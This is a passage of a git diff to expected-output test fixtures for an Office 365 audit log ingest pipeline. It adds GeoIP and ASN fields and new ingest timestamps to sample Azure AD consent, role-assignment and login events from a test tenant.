Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622848\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"24524679-8930-4afd-83b8-2dc70aa0a016\",\"ModifiedProperties\":[{\"Name\":\"ConsentContext.IsAdminConsent\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.IsAppOnly\",\"NewValue\":\"False\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.OnBehalfOfAll\",\"NewValue\":\"True\",\"OldValue\":\"\"},{\"Name\":\"ConsentContext.Tags\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ConsentAction.Permissions\",\"NewValue\":\"[] =\\u003e [[Id: 8OmR-4WUaEqJ6aFk0groVfmOUpib6JpGsZv6jnKgD6Y, ClientId: fb91e9f0-9485-4a68-89e9-a164d20ae855, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; \",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Consent to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -18253,6 +19405,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -18415,7 +19579,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125396900Z", + "ingested": "2021-12-14T14:48:43.176744890Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -18442,6 +19606,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -18604,7 +19780,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125401700Z", + "ingested": "2021-12-14T14:48:43.176745399Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -18631,6 +19807,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -18793,7 +19981,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125407700Z", + "ingested": "2021-12-14T14:48:43.176745856Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"UserManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"User\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"User.ObjectID\\\",\\\"User.UPN\\\",\\\"User.PUID\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"755e500a-6c03-46b0-b53b-282f23374e3b\\\",\\\"ObjectClass\\\":\\\"User\\\",\\\"UPN\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"PUID\\\":\\\"1003200096971F55\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.1421458Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622843\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fb84e87b-9a45-49bf-91d8-30f3880ca99d\",\"ModifiedProperties\":[{\"Name\":\"User.ObjectID\",\"NewValue\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"OldValue\":\"\"},{\"Name\":\"User.UPN\",\"NewValue\":\"asr@testsiem.onmicrosoft.com\",\"OldValue\":\"\"},{\"Name\":\"User.PUID\",\"NewValue\":\"1003200096971F55\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add app role assignment grant to user.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json index 43ffb7d9847..bc4b62e5e20 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-azuread-sts-logon-events.json-expected.json @@ -2,6 +2,18 @@ "expected": [ { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -82,7 +94,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970069Z", + "ingested": "2021-12-14T14:49:08.047393882Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"4345a7b9-9a63-4910-a426-35363201d503\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:13\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"ca0efc24-1b89-4962-8fef-a3ac5437302f\",\"InterSystemsId\":\"03616b3a-fc75-46a1-b34a-2d82fc8f1e7e\",\"IntraSystemId\":\"c4206c29-46c2-4a6f-a46b-735107705400\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -122,6 +134,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -202,7 +226,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970080Z", + "ingested": "2021-12-14T14:49:08.047396789Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"b53de36d-ea71-4ebf-9b71-feb431bd4eba\",\"InterSystemsId\":\"05d69096-cb90-4690-ae69-8acd5177b3e0\",\"IntraSystemId\":\"ed155e11-60b3-4764-b9aa-05c35f3bb800\",\"ModifiedProperties\":[],\"ObjectId\":\"00000003-0000-0000-c000-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -242,6 +266,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -322,7 +358,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970086Z", + "ingested": "2021-12-14T14:49:08.047397351Z", "original": 